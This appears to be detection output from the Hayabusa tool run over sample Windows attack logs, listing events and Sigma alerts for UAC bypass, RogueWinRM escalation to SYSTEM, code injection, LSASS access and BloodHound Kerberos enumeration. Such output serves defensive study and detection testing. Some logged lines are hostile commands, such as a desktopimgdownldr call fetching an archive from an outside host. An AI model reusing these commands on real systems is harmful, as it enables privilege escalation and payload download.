2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386  :  Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe  -p c:\Windows\System32\cmd.exe  :  Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: RogueWinRM.exe  -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: spooler.exe  payload.bin  :  Path: C:\Users\Public\tools\cinj\spooler.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad  :  Path: C:\Windows\System32\notepad.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: chost.exe  payload.bin  :  Path: C:\Users\Public\tools\evasion\chost.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad  :  Path: C:\Windows\System32\notepad.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe  /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr   :  Path: C:\Windows\System32\desktopimgdownldr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image  :  URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx
2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe  /root,""c:\windows\System32\calc.exe""  :  Path: C:\Windows\explorer.exe  :  User: ECORP\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding  :  Path: C:\Windows\explorer.exe  :  User: ECORP\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: ECORP\Administrator  :  Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe""   :  Path: C:\Windows\System32\win32calc.exe  :  User: ECORP\Administrator  :  Parent Command: ""C:\Windows\System32\calc.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx
2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ATACORE01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: PKI01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: EXCHANGE01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: WEC01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: FS02$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: WSUS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: DHCP01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ATANIDS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: PRTG-MON$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: MSSQL01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: FS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ADFS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: WEBIIS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: FS03VULN$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
